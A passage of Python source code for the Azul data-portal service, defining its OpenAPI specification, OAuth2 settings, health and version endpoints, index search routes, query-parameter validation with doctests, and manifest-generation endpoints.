# update for breaking changes, and a minor version otherwise
'version': '1.0'
},
'tags': [
{
'name': 'Index',
'description': 'Query the indices for entities of interest'
},
{
'name': 'Manifests',
'description': 'Complete listing of files matching a given filter in TSV and other formats'
},
{
'name': 'Repository',
'description': 'Access to data files in the underlying repository'
},
{
'name': 'DSS',
'description': 'Access to files maintained in the Data Store'
},
{
'name': 'DRS',
'description': 'DRS-compliant proxy of the underlying repository'
},
{
'name': 'Auxiliary',
'description': 'Describes various aspects of the Azul service'
}
]
}
class ServiceApp(AzulChaliceApp):
def spec(self) -> JSON:
return {
**super().spec(),
**self._oauth2_spec()
}
def _oauth2_spec(self) -> JSON:
scopes = ('email',)
return {
'components': {
'securitySchemes': {
self.app_name: {
'type': 'oauth2',
'flows': {
'implicit': {
'authorizationUrl': 'https://accounts.google.com/o/oauth2/auth',
'scopes': {scope: scope for scope in scopes},
}
}
}
}
},
'security': [
{},
{self.app_name: scopes}
],
}
@property
def drs_controller(self) -> DRSController:
return self._create_controller(DRSController)
@property
def health_controller(self) -> HealthController:
# Don't cache. Health controller is meant to be short-lived since it
# applies it's own caching. If we cached the controller, we'd never
# observe any changes in health.
return HealthController(lambda_name='service')
@cached_property
def catalog_controller(self) -> CatalogController:
return self._create_controller(CatalogController)
@property
def repository_controller(self) -> RepositoryController:
return self._create_controller(RepositoryController)
@cached_property
def manifest_controller(self) -> ManifestController:
return self._create_controller(ManifestController,
step_function_lambda_name=generate_manifest.name,
manifest_url_func=self.manifest_url)
def _create_controller(self, controller_cls, **kwargs):
return controller_cls(lambda_context=self.lambda_context,
file_url_func=self.file_url,
**kwargs)
@property
def catalog(self) -> str:
request = self.current_request
# request is none during `chalice package`
if request is not None:
# params is None whenever no params are passed
params = request.query_params
if params is not None:
try:
return params['catalog']
except KeyError:
pass
return config.default_catalog
@property
def metadata_plugin(self) -> MetadataPlugin:
return self._metadata_plugin(self.catalog)
@cache
def _metadata_plugin(self, catalog: CatalogName):
return MetadataPlugin.load(catalog).create()
@property
def service_config(self) -> ServiceConfig:
return self.metadata_plugin.service_config()
@property
def facets(self) -> Sequence[str]:
return sorted(self.service_config.translation.keys())
def __init__(self):
super().__init__(app_name=config.service_name,
app_module_path=__file__,
# see LocalAppTestCase.setUpClass()
unit_test=globals().get('unit_test', False),
spec=spec)
def get_pagination(self, entity_type: str) -> Pagination:
query_params = self.current_request.query_params or {}
default_sort, default_order = sort_defaults[entity_type]
pagination = Pagination(order=query_params.get('order', default_order),
size=int(query_params.get('size', '10')),
sort=query_params.get('sort', default_sort),
self_url=app.self_url()) # For `_generate_paging_dict()`
sa = query_params.get('search_after')
sb = query_params.get('search_before')
sa_uid = query_params.get('search_after_uid')
sb_uid = query_params.get('search_before_uid')
if not sb and sa:
pagination.search_after = [json.loads(sa), sa_uid]
elif not sa and sb:
pagination.search_before = [json.loads(sb), sb_uid]
elif sa and sb:
raise BadArgumentException("Bad arguments, only one of search_after or search_before can be set")
return pagination
# FIXME: Return furl instance
# https://github.com/DataBiosphere/azul/issues/3398
def file_url(self,
catalog: CatalogName,
file_uuid: str,
fetch: bool = True,
**params: str) -> str:
file_uuid = urllib.parse.quote(file_uuid, safe='')
view_function = fetch_repository_files if fetch else repository_files
path = one(view_function.path)
return str(furl(url=self.self_url(path.format(file_uuid=file_uuid)),
args=dict(catalog=catalog,
**params)))
def _authenticate(self) -> Optional[OAuth2]:
try:
header = self.current_request.headers['Authorization']
except KeyError:
return None
else:
try:
auth_type, auth_token = header.split()
except ValueError:
raise UnauthorizedError(header)
else:
if auth_type.lower() == 'bearer':
return OAuth2(auth_token)
else:
raise UnauthorizedError(header)
# FIXME: Return furl instance
# https://github.com/DataBiosphere/azul/issues/3398
def manifest_url(self,
fetch: bool,
catalog: CatalogName,
format_: ManifestFormat,
**params: str) -> str:
view_function = fetch_file_manifest if fetch else file_manifest
return str(furl(url=self.self_url(one(view_function.path)),
args=dict(catalog=catalog,
format=format_.value,
**params)))
app = ServiceApp()
configure_app_logging(app, log)
sort_defaults = {
'files': ('fileName', 'asc'),
'samples': ('sampleId', 'asc'),
'projects': ('projectTitle', 'asc'),
'bundles': ('bundleVersion', 'desc')
}
@app.route('/', cors=True)
def swagger_ui():
swagger_ui_template = app.load_static_resource('swagger-ui.html.template.mustache')
swagger_ui_html = chevron.render(swagger_ui_template, {
'OAUTH2_CLIENT_ID': json.dumps(config.google_oauth2_client_id),
'OAUTH2_REDIRECT_URL': json.dumps(app.self_url('/oauth2_redirect'))
})
return Response(status_code=200,
headers={"Content-Type": "text/html"},
body=swagger_ui_html)
@app.route('/oauth2_redirect', enabled=config.google_oauth2_client_id is not None)
def oauth2_redirect():
oauth2_redirect_html = app.load_static_resource('oauth2-redirect.html')
return Response(status_code=200,
headers={"Content-Type": "text/html"},
body=oauth2_redirect_html)
@app.route('/openapi', methods=['GET'], cors=True, method_spec={
'summary': 'Return OpenAPI specifications for this service',
'description': 'This endpoint returns the [OpenAPI specifications]'
'(https://github.com/OAI/OpenAPI-Specification) for this '
'service. These are the specifications used to generate the '
'page you are visiting now.',
'responses': {
'200': {
'description': '200 response',
**responses.json_content(
schema.object(
openapi=str,
**{
k: schema.object()
for k in ('info', 'tags', 'servers', 'paths', 'components')
}
)
)
}
},
'tags': ['Auxiliary']
})
def openapi():
return Response(status_code=200,
headers={'content-type': 'application/json'},
body=app.spec())
health_up_key = {
'up': format_description('''
indicates the overall result of the health check
'''),
}
fast_health_keys = {
**{
prop.key: format_description(prop.description)
for prop in HealthController.fast_properties['service']
},
**health_up_key
}
health_all_keys = {
**{
prop.key: format_description(prop.description)
for prop in HealthController.all_properties
},
**health_up_key
}
def health_spec(health_keys: dict):
return {
'responses': {
f'{200 if up else 503}': {
'description': format_description(f'''
{'The' if up else 'At least one of the'} checked resources
{'are' if up else 'is not'} healthy.
The response consists of the following keys:
''') + ''.join(f'* `{k}` {v}' for k, v in health_keys.items()) + format_description(f'''
The top-level `up` key of the response is
`{'true' if up else 'false'}`.
''') + (format_description(f'''
{'All' if up else 'At least one'} of the nested `up` keys
{'are `true`' if up else 'is `false`'}.
''') if len(health_keys) > 1 else ''),
**responses.json_content(
schema.object(
additional_properties=schema.object(
additional_properties=True,
up=schema.enum(up)
),
up=schema.enum(up)
),
example={
k: up if k == 'up' else {} for k in health_keys
}
)
} for up in [True, False]
},
'tags': ['Auxiliary']
}
@app.route('/health', methods=['GET'], cors=True, method_spec={
'summary': 'Complete health check',
'description': format_description('''
Health check of the service and all resources it depends on. This may
take long time to complete and exerts considerable load on the service.
For that reason it should not be requested frequently or by automated
monitoring facilities that would be better served by the
[`/health/fast`](#operations-Auxiliary-get_health_fast) or
[`/health/cached`](#operations-Auxiliary-get_health_cached) endpoints.
'''),
**health_spec(health_all_keys)
})
def health():
return app.health_controller.health()
@app.route('/health/basic', methods=['GET'], cors=True, method_spec={
'summary': 'Basic health check',
'description': format_description('''
Health check of only the REST API itself, excluding other resources
the service depends on. A 200 response indicates that the service is
reachable via HTTP(S) but nothing more.
'''),
**health_spec(health_up_key)
})
def basic_health():
return app.health_controller.basic_health()
@app.route('/health/cached', methods=['GET'], cors=True, method_spec={
'summary': 'Cached health check for continuous monitoring',
'description': format_description('''
Return a cached copy of the
[`/health/fast`](#operations-Auxiliary-get_health_fast) response.
This endpoint is optimized for continuously running, distributed health
monitors such as Route 53 health checks. The cache ensures that the
service is not overloaded by these types of health monitors. The cache
is updated every minute.
'''),
**health_spec(fast_health_keys)
})
def cached_health():
return app.health_controller.cached_health()
@app.route('/health/fast', methods=['GET'], cors=True, method_spec={
'summary': 'Fast health check',
'description': format_description('''
Performance-optimized health check of the REST API and other critical
resources the service depends on. This endpoint can be requested more
frequently than [`/health`](#operations-Auxiliary-get_health) but
periodically scheduled, automated requests should be made to
[`/health/cached`](#operations-Auxiliary-get_health_cached).
'''),
**health_spec(fast_health_keys)
})
def fast_health():
return app.health_controller.fast_health()
@app.route('/health/{keys}', methods=['GET'], cors=True, method_spec={
'summary': 'Selective health check',
'description': format_description('''
This endpoint allows clients to request a health check on a specific set
of resources. Each resource is identified by a *key*, the same key
under which the resource appears in a
[`/health`](#operations-Auxiliary-get_health) response.
'''),
**health_spec(health_all_keys)
}, path_spec={
'parameters': [
params.path(
'keys',
type_=schema.array(schema.enum(*sorted(HealthController.all_keys()))),
description='''
A comma-separated list of keys selecting the health checks to be
performed. Each key corresponds to an entry in the response.
''')
],
})
def custom_health(keys: Optional[str] = None):
return app.health_controller.custom_health(keys)
@app.schedule('rate(1 minute)', name='servicecachehealth')
def update_health_cache(_event: chalice.app.CloudWatchEvent):
app.health_controller.update_cache()
@app.route('/version', methods=['GET'], cors=True, method_spec={
'summary': 'Describe current version of the Azul service',
'tags': ['Auxiliary'],
'responses': {
'200': {
'description': 'Version endpoint is reachable.',
**responses.json_content(
schema.object(
git=schema.object(
commit=str,
dirty=bool
),
changes=schema.array(
schema.object(
title=str,
issues=schema.array(str),
upgrade=schema.array(str),
notes=schema.optional(str)
)
)
)
)
}
}
})
def version():
from azul.changelog import (
compact_changes,
)
return {
'git': config.lambda_git_status,
'changes': compact_changes(limit=10)
}
def validate_repository_search(params, **validators):
validate_params(params, **{
'catalog': validate_catalog,
'filters': validate_filters,
'order': str,
'search_after': str,
'search_after_uid': str,
'search_before': str,
'search_before_uid': str,
'size': validate_size,
'sort': validate_facet,
**validators
})
min_page_size = 1
max_page_size = 1000
def validate_catalog(catalog):
try:
config.Catalog.validate_name(catalog)
except RequirementError as e:
raise BadRequestError(e)
else:
if catalog not in config.catalogs:
raise BadRequestError(f'Catalog name {catalog!r} is invalid. '
f'Must be one of {set(config.catalogs)}.')
def validate_size(size):
"""
>>> validate_size('1000')
>>> validate_size('1001')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`, must not be greater than 1000
>>> validate_size('0')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`, must be greater than 0
>>> validate_size('foo')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for parameter `size`
"""
try:
size = int(size)
except BaseException:
raise BadRequestError('Invalid value for parameter `size`')
else:
if size > max_page_size:
raise BadRequestError(f'Invalid value for parameter `size`, must not be greater than {max_page_size}')
elif size < min_page_size:
raise BadRequestError('Invalid value for parameter `size`, must be greater than 0')
def validate_filters(filters):
"""
>>> validate_filters('{"fileName": {"is": ["foo.txt"]}}')
>>> validate_filters('"')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The `filters` parameter is not valid JSON
>>> validate_filters('""')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The `filters` parameter must be a dictionary.
>>> validate_filters('{"sampleDisease": ["H syndrome"]}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: \
The `filters` parameter entry for `sampleDisease` must be a single-item dictionary.
>>> validate_filters('{"sampleDisease": {"is": "H syndrome"}}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The value of the `is` relation in the `filters` parameter entry for \
`sampleDisease` is not a list.
>>> validate_filters('{"sampleDisease": {"was": "H syndrome"}}') # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The relation in the `filters` parameter entry for `sampleDisease` \
must be one of ('is', 'contains', 'within', 'intersects')
>>> validate_filters('{"fileSource": {"is": [["foo:23/33"]]}}')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: The value of the `is` relation in the `filters` parameter is invalid.
"""
try:
filters = json.loads(filters)
except Exception:
raise BadRequestError('The `filters` parameter is not valid JSON')
if type(filters) is not dict:
raise BadRequestError('The `filters` parameter must be a dictionary.')
for facet, filter_ in filters.items():
validate_facet(facet)
try:
relation, values = one(filter_.items())
except Exception:
raise BadRequestError(f'The `filters` parameter entry for `{facet}` must be a single-item dictionary.')
else:
valid_relations = ('is', 'contains', 'within', 'intersects')
if relation in valid_relations:
if not isinstance(values, list):
raise BadRequestError(
msg=f'The value of the `{relation}` relation in the `filters` parameter '
f'entry for `{facet}` is not a list.')
else:
raise BadRequestError(f'The relation in the `filters` parameter entry for `{facet}`'
f' must be one of {valid_relations}')
if relation == 'is':
value_types = reify(Union[JSON, PrimitiveJSON])
if not all(isinstance(value, value_types) for value in values):
raise BadRequestError('The value of the `is` relation in the `filters` '
'parameter is invalid.')
if facet == 'organismAge':
validate_organism_age_filter(values)
def validate_organism_age_filter(values):
for value in values:
try:
value_and_unit.to_index(value)
except RequirementError as e:
raise BadRequestError(e)
def validate_facet(facet_name: str):
"""
>>> validate_facet('fileName')
>>> validate_facet('fooBar')
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Unknown facet `fooBar`
"""
if facet_name not in app.service_config.translation:
raise BadRequestError(msg=f'Unknown facet `{facet_name}`')
class Mandatory:
"""
Validation wrapper signifying that a parameter is mandatory.
"""
def __init__(self, validator: Callable) -> None:
super().__init__()
self._validator = validator
def __call__(self, param):
return self._validator(param)
def validate_params(query_params: Mapping[str, str],
allow_extra_params: bool = False,
**validators: Callable[[Any], Any]) -> None:
"""
Validates request query parameters for web-service API.
:param query_params: the parameters to be validated
:param allow_extra_params:
When False, only parameters specified via '**validators' are
accepted, and validation fails if additional parameters are present.
When True, additional parameters are allowed but their value is not
validated.
:param validators:
A dictionary mapping the name of a parameter to a function that will
be used to validate the parameter if it is provided. The callable
will be called with a single argument, the parameter value to be
validated, and is expected to raise ValueError, TypeError or
azul.RequirementError if the value is invalid. Only these exceptions
will yield a 4xx status response, all other exceptions will yield a
500 status response. If the validator is an instance of `Mandatory`,
then validation will fail if its corresponding parameter is not
provided.
>>> validate_params({'order': 'asc'}, order=str)
>>> validate_params({'size': 'foo'}, size=int)
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Invalid value for `size`
>>> validate_params({'order': 'asc', 'foo': 'bar'}, order=str)
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Unknown query parameter `foo`
>>> validate_params({'order': 'asc', 'foo': 'bar'}, order=str, allow_extra_params=True)
>>> validate_params({}, foo=str)
>>> validate_params({}, foo=Mandatory(str))
Traceback (most recent call last):
...
chalice.app.BadRequestError: BadRequestError: Missing required query parameter `foo`
"""
def fmt_error(err_description, params):
# Sorting is to produce a deterministic error message
joined = ', '.join(f'`{p}`' for p in sorted(params))
return f'{err_description} {pluralize("query parameter", len(params))} {joined}'
provided_params = query_params.keys()
validation_params = validators.keys()
mandatory_params = {p for p, v in validators.items() if isinstance(v, Mandatory)}
if not allow_extra_params:
extra_params = provided_params - validation_params
if extra_params:
raise BadRequestError(msg=fmt_error('Unknown', extra_params))
if mandatory_params:
missing_params = mandatory_params - provided_params
if missing_params:
raise BadRequestError(msg=fmt_error('Missing required', missing_params))
for param_name, param_value in query_params.items():
try:
validator = validators[param_name]
except KeyError:
pass
else:
try:
validator(param_value)
except (TypeError, ValueError, RequirementError):
raise BadRequestError(msg=f'Invalid value for `{param_name}`')
@app.route('/integrations', methods=['GET'], cors=True)
def get_integrations():
query_params = app.current_request.query_params or {}
validate_params(query_params,
entity_type=Mandatory(str),
integration_type=Mandatory(str),
entity_ids=str)
try:
entity_ids = query_params['entity_ids']
except KeyError:
# Case where parameter is absent (do not filter using entity_id field)
entity_ids = None
else:
if entity_ids:
# Case where parameter is present and non-empty (filter for matching id value)
entity_ids = {entity_id.strip() for entity_id in entity_ids.split(',')}
else:
# Case where parameter is present but empty (filter for missing entity_id field,
# i.e., there are no acceptable id values)
entity_ids = set()
entity_type = query_params['entity_type']
integration_type = query_params['integration_type']
portal_service = PortalService()
body = portal_service.list_integrations(entity_type, integration_type, entity_ids)
return Response(status_code=200,
headers={"content-type": "application/json"},
body=json.dumps(body))
@app.route(
'/index/catalogs',
methods=['GET'],
cors=True,
method_spec={
'summary': 'List all available catalogs',
'tags': ['Index'],
'responses': {
'200': {
'description': format_description('''
The name of the default catalog and a list of all available
catalogs. For each catalog, the response includes the name
of the atlas the catalog belongs to, a flag indicating
whether the catalog is for internal use only as well as the
names and types of plugins currently active for the catalog.
For some plugins, the response includes additional
configuration properties, such as the source used by the
repository plugin to populate the catalog.
'''),
**responses.json_content(
# The custom return type annotation is an experiment. Please
# don't adopt this just yet elsewhere in the program.
signature(app.catalog_controller.list_catalogs).return_annotation
)
}
}
}
)
def list_catalogs():
return app.catalog_controller.list_catalogs()
def repository_search(entity_type: str,
item_id: Optional[str],
) -> JSON:
request = app.current_request
query_params = request.query_params or {}
validate_repository_search(query_params)
return app.repository_controller.search(catalog=app.catalog,
entity_type=entity_type,
file_url_func=app.file_url,
item_id=item_id,
filters=query_params.get('filters'),
pagination=app.get_pagination(entity_type),
authentication=request.authentication)
generic_object_spec = schema.object(additional_properties=True)
array_of_object_spec = schema.array(generic_object_spec)
hit_spec = schema.object(
additional_properties=True,
protocols=array_of_object_spec,
entryId=str,
sources=array_of_object_spec,
samples=array_of_object_spec,
specimens=array_of_object_spec,
cellLines=array_of_object_spec,
donorOrganisms=array_of_object_spec,
organoids=schema.array(str),
cellSuspensions=array_of_object_spec,
)
page_spec = schema.object(
hits=schema.array(hit_spec),
pagination=generic_object_spec,
termFacets=generic_object_spec
)
filters_param_spec = params.query(
'filters',
schema.optional(application_json(schema.object_type(
default='{}',
example={'cellCount': {'within': [[10000, 1000000000]]}},
properties={
facet: {
'oneOf': [
schema.object(is_=schema.array({})),
*(
schema.object_type({
op: schema.array({}, minItems=2, maxItems=2)
})
for op in ['contains', 'within', 'intersects']
)
]
}
for facet in app.facets
}
))),
# FIXME: Spec for `filters` argument should be driven by field types
# https://github.com/DataBiosphere/azul/issues/2254
description=format_description('''
Criteria to filter entities from the search results.
Each filter consists of a facet name, a relational operator, and an
array of facet values. The available operators are "is", "within",
"contains", and "intersects". Multiple filters are combined using "and"
logic. An entity must match all filters to be included in the response.
How multiple facet values within a single filter are combined depends
on the operator.
For the "is" operator, multiple values are combined using "or"
logic. For example, `{"fileFormat": {"is": ["fastq", "fastq.gz"]}}`
selects entities where the file format is either "fastq" or
"fastq.gz". For the "within", "intersects", and "contains"
operators, the facet values must come in nested pairs specifying
upper and lower bounds, and multiple pairs are combined using "and"
logic. For example, `{"donorCount": {"within": [[1,5], [5,10]]}}`
selects entities whose donor organism count falls within both
ranges, i.e., is exactly 5.
The organismAge facet is special in that it contains two property keys:
value and unit. For example, `{"organismAge": {"is": [{"value": "20",
"unit": "year"}]}}`. Both keys are required. `{"organismAge": {"is":
[null]}}` selects entities that have no organism age.''' + f'''
Supported facet names are: {', '.join(app.facets)}
''')
)
catalog_param_spec = params.query(
'catalog',
schema.optional(schema.with_default(app.catalog,
type_=schema.enum(*config.catalogs))),
description='The name of the catalog to query.')
def repository_search_params_spec(index_name):
sort_default, order_default = sort_defaults[index_name]
return [
catalog_param_spec,
filters_param_spec,
params.query(
'size',
schema.optional(schema.with_default(10, type_=schema.in_range(min_page_size, max_page_size))),
description='The number of hits included per page.'),
params.query(
'sort',
schema.optional(schema.with_default(sort_default, type_=schema.enum(*app.facets))),
description='The facet to sort the hits by.'),
params.query(
'order',
schema.optional(schema.with_default(order_default, type_=schema.enum('asc', 'desc'))),
description=format_description('''
The ordering of the sorted hits, either ascending
or descending.
''')
),
*[
params.query(
param,
schema.optional(str),
description=format_description('''
Use the `next` and `previous` properties of the
`pagination` response element to navigate between pages.
'''),
deprecated=True)
for param in [
'search_before',
'search_before_uid',
'search_after',
'search_after_uid'
]
]
]
def repository_search_spec(index_name):
id_spec_link = f'#operations-Index-get_index_{index_name}__{index_name.rstrip("s")}_id_'
return {
'summary': f'Search the {index_name} index for entities of interest.',
'tags': ['Index'],
'parameters': repository_search_params_spec(index_name),
'responses': {
'200': {
'description': format_description(f'''
Paginated list of {index_name} that meet the search
criteria ("hits"). The structure of these hits is documented
under the [corresponding endpoint for a specific entity]({id_spec_link}).
The `pagination` section describes the total number of hits
and total number of pages, as well as user-supplied search
parameters for page size and sorting behavior. It also
provides links for navigating forwards and backwards between
pages of results.
The `termFacets` section tabulates the occurrence of unique
values within nested fields of the `hits` section across all
entities meeting the filter criteria (this includes entities
not listed on the current page, meaning that this section
will be invariable across all pages from the same search).
Not every nested field is tabulated, but the set of
tabulated fields is consistent between entity types.
'''),
**responses.json_content(page_spec)
}
}
}
def repository_id_spec(index_name_singular: str):
search_spec_link = f'#operations-Index-get_index_{index_name_singular}s'
return {
'summary': f'Detailed information on a particular {index_name_singular} entity.',
'tags': ['Index'],
'parameters': [
catalog_param_spec,
params.path(f'{index_name_singular}_id', str, description=f'The UUID of the desired {index_name_singular}')
],
'responses': {
'200': {
'description': format_description(f'''
This response describes a single {index_name_singular} entity. To
search the index for multiple entities, see the
[corresponding search endpoint]({search_spec_link}).
The properties that are common to all entity types are
listed in the schema below; however, additional properties
may be present for certain entity types. With the exception
of the {index_name_singular}'s unique identifier, all
properties are arrays, even in cases where only one value is
present.
The structures of the objects within these arrays are not
perfectly consistent, since they may represent either
singleton entities or aggregations depending on context.
For example, any biomaterial that yields a cell suspension
which yields a sequence file will be considered a "sample".
Therefore, the `samples` field is polymorphic, and each
sample may be either a specimen, an organoid, or a cell
line (the field `sampleEntityType` can be used to
discriminate between these cases).
'''),
**responses.json_content(hit_spec)
}
}
}
def repository_head_spec(index_name):
search_spec_link = f'#operations-Index-get_index_{index_name}'
return {
'summary': 'Perform a query without returning its result.',
'tags': ['Index'],
'responses': {
'200': {
'description': format_description(f'''
The HEAD method can be used to test whether the
{index_name} index is operational, or to check the validity
of query parameters for the
[GET method]({search_spec_link}).
''')
}
}
}
def repository_head_search_spec(index_name):
return {
**repository_head_spec(index_name),
'parameters': repository_search_params_spec(index_name)
}
repository_summary_spec = {
'tags': ['Index'],
'parameters': [catalog_param_spec, filters_param_spec]
}
@app.route('/index/files', methods=['GET'], method_spec=repository_search_spec('files'), cors=True)
@app.route('/index/files', methods=['HEAD'], method_spec=repository_head_search_spec('files'), cors=True)
@app.route('/index/files/{file_id}', methods=['GET'], method_spec=repository_id_spec('file'), cors=True)
def get_data(file_id: Optional[str] = None) -> JSON:
return repository_search('files', file_id)
@app.route('/index/samples', methods=['GET'], method_spec=repository_search_spec('samples'), cors=True)
@app.route('/index/samples', methods=['HEAD'], method_spec=repository_head_search_spec('samples'), cors=True)
@app.route('/index/samples/{sample_id}', methods=['GET'], method_spec=repository_id_spec('sample'), cors=True)
def get_sample_data(sample_id: Optional[str] = None) -> JSON:
return repository_search('samples', sample_id)
@app.route('/index/bundles', methods=['GET'], method_spec=repository_search_spec('bundles'), cors=True)
@app.route('/index/bundles', methods=['HEAD'], method_spec=repository_head_search_spec('bundles'), cors=True)
@app.route('/index/bundles/{bundle_id}', methods=['GET'], method_spec=repository_id_spec('bundle'), cors=True)
def get_bundle_data(bundle_id: Optional[str] = None) -> JSON:
return repository_search('bundles', bundle_id)
@app.route('/index/projects', methods=['GET'], method_spec=repository_search_spec('projects'), cors=True)
@app.route('/index/projects', methods=['HEAD'], method_spec=repository_head_search_spec('projects'), cors=True)
@app.route('/index/projects/{project_id}', methods=['GET'], method_spec=repository_id_spec('project'), cors=True)
def get_project_data(project_id: Optional[str] = None) -> JSON:
return repository_search('projects', project_id)
@app.route('/index/summary', methods=['GET'], method_spec={
'summary': 'Statistics on the data present across all entities.',
'responses': {
'200': {
'description': format_description('''
Counts the total number and total size in bytes of assorted
entities, subject to the provided filters.
`fileTypeSummaries` provides the count and total size in bytes
of files grouped by their format, e.g. "fastq" or "matrix."
`fileCount` and `totalFileSize` compile these figures across all
file formats. Likewise, `cellCountSummaries` counts cells and
their associated documents grouped by organ type, with
`totalCellCount` compiling cell counts across organ types and
`organTypes` listing all referenced organs.
Total counts of unique entities are also provided for other
entity types such as projects and tissue donors. These values
are not grouped/aggregated.
'''),
**responses.json_content(
schema.object(
additional_properties=True,
organTypes=schema.array(str),
totalFileSize=float,
fileTypeSummaries=array_of_object_spec,
totalCellCount=float,
cellCountSummaries=array_of_object_spec,
projectEstimatedCellCount=float,
donorCount=int,
fileCount=int,
labCount=int,
projectCount=int,
speciesCount=int,
specimenCount=int,
)
)
}
},
**repository_summary_spec
}, cors=True)
@app.route('/index/summary', methods=['HEAD'], method_spec={
**repository_head_spec('summary'),
**repository_summary_spec
})
def get_summary():
"""
Returns a summary based on the filters passed on to the call. Based on the
ICGC endpoint.
:return: Returns a jsonified Summary API response
"""
request = app.current_request
query_params = request.query_params or {}
validate_params(query_params,
filters=str,
catalog=config.Catalog.validate_name)
filters = query_params.get('filters', '{}')
validate_filters(filters)
return app.repository_controller.summary(catalog=app.catalog,
filters=filters,
authentication=request.authentication)
@app.route('/index/files/order', methods=['GET'], cors=True, method_spec={
'parameters': [
catalog_param_spec
],
'deprecated': True,
'responses': {'200': {'description': 'OK'}},
'tags': ['Index']
})
def get_order():
"""
Return the ordering on facets
"""
return {'order': app.service_config.order_config}
token_param_spec = params.query('token',
schema.optional(str),
description='Reserved. Do not pass explicitly.')
def manifest_path_spec(*, fetch: bool):
return {
'parameters': [
catalog_param_spec,
filters_param_spec,
params.query(
'format',
schema.optional(
schema.enum(
*[
format_.value for format_ in ManifestFormat
],
type_=str
)
),
description=f'''
The desired format of the output.
- `{ManifestFormat.compact.value}` (the default) for a compact, tab-separated
manifest
- `{ManifestFormat.terra_bdbag.value}` for a manifest in the
[BDBag format][1]. This provides a ZIP file containing two manifests: one for
Participants (aka Donors) and one for Samples (aka Specimens). For more on the
format of the manifests see [documentation here][2].
- `{ManifestFormat.terra_pfb.value}` for a manifest in the [PFB format][3]. This
format is mainly used for exporting data to Terra.
- `{ManifestFormat.curl.value}` for a [curl configuration file][4] manifest.
This manifest can be used with the curl program to download all the files listed
in the manifest.
[1]: http://bd2k.ini.usc.edu/tools/bdbag/
[2]: https://software.broadinstitute.org/firecloud/documentation/article?id=10954
[3]: https://github.com/uc-cdis/pypfb
[4]: https://curl.haxx.se/docs/manpage.html#-K
''',
),
*(
[] if fetch else [
params.query('objectKey',
schema.optional(str),
description='Reserved. Do not pass explicitly.')
]
),
token_param_spec
],
}
@app.route('/manifest/files', methods=['GET'], cors=True, path_spec=manifest_path_spec(fetch=False), method_spec={
'tags': ['Manifests'],
'summary': 'Request a download link to a manifest file and redirect',
'description': format_description('''
Initiate and check status of a manifest generation job, returning
either a 301 response redirecting to a URL to re-check the status of
the manifest generation or a 302 response redirecting to the location
of the completed manifest.
'''),
'responses': {
'301': {
'description': format_description('''
The manifest generation has been started or is ongoing.
The response is a redirect back to this endpoint, so the client
should expect a subsequent response of the same kind.
'''),
'headers': {
'Location': {
'description': 'URL to recheck the status of the '
'manifest generation.',
'schema': {'type': 'string', 'format': 'url'},
},
'Retry-After': {
'description': 'Recommended number of seconds to wait '
'before requesting the URL specified in '
'the Location header.',
'schema': {'type': 'string'},
},
},
},
'302': {
'description': format_description('''
The manifest generation is complete and ready for download.
'''),
'headers': {
'Location': {
'description': 'URL that will yield the actual '
'manifest file.',
'schema': {'type': 'string', 'format': 'url'},
},
'Retry-After': {
'description': 'Recommended number of seconds to wait '
'before requesting the URL specified in '
'the Location header.',
'schema': {'type': 'string'},
},
},
},
'410': {
'description': format_description('''
The manifest associated with the `objectKey` in this request has
expired. Request a new manifest.
''')
}
},
})
def file_manifest():
return _file_manifest(fetch=False)
keys = CurlManifestGenerator.command_lines(url='', file_name='').keys()
command_line_spec = schema.object(**{key: str for key in keys})
@app.route('/fetch/manifest/files', methods=['GET'], cors=True, path_spec=manifest_path_spec(fetch=True), method_spec={
'tags': ['Manifests'],
'summary': 'Request a download link to a manifest file and check status',
'description': format_description('''
Initiate a manifest generation or check the status of an already ongoing
generation, returning a 200 response with simulated HTTP headers in the
body.
'''),
'responses': {
'200': {
**responses.json_content(
schema.object(
Status=int,
Location={'type': 'string', 'format': 'url'},
**{'Retry-After': schema.optional(int)},
CommandLine=command_line_spec
)
),
'description': format_description('''
Manifest generation with status report, emulating the response
code and headers of the `/manifest/files` endpoint. Note that
the actual HTTP response will have status 200 while the `Status`
field of the body will be 301 or 302. The intent is to emulate
HTTP while bypassing the default client behavior, which (in most
web browsers) is to ignore `Retry-After`. The response described
here is intended to be processed by client-side Javascript such
that the recommended delay in `Retry-After` can be handled in
Javascript rather than relying on the native implementation by
the web browser.
For a detailed description of the fields in the response see
the documentation for the headers they emulate in the
[`/manifest/files`](#operations-Manifests-get_manifest_files)
endpoint response.
'''),
},
},
})
def fetch_file_manifest():
return _file_manifest(fetch=True)
def _file_manifest(fetch: bool):
query_params = app.current_request.query_params or {}
query_params.setdefault('filters', '{}')
query_params.setdefault('format', ManifestFormat.compact.value)
# FIXME: Remove `object_key` when Swagger validation lands
# https://github.com/DataBiosphere/azul/issues/1465
# The objectKey query parameter is not allowed in /fetch/manifest/files
object_key = {} if fetch else {'objectKey': str}
validate_params(query_params,
format=ManifestFormat,
catalog=config.Catalog.validate_name,
filters=str,
token=str,
**object_key)
validate_filters(query_params['filters'])
return app.manifest_controller.get_manifest_async(self_url=app.self_url(),
catalog=app.catalog,
query_params=query_params,
fetch=fetch)
@app.lambda_function(name='manifest')
def generate_manifest(event: AnyJSON, context: LambdaContext):
assert isinstance(event, Mapping)
assert all(isinstance(k, str) for k in event.keys())
return app.manifest_controller.get_manifest(event)
file_fqid_parameters_spec = [
params.path(
'file_uuid',
str,
description='The UUID of the file to be returned.'),
params.query(
'version',
schema.optional(str),
description=format_description('''
The version of the file to be returned. File versions are opaque
strings with only one documented property: they can be
lexicographically compared with each other in order to determine
which version is more recent. If this parameter is omitted then the
most recent version of the file is returned.
''')
)
]
repository_files_spec = {
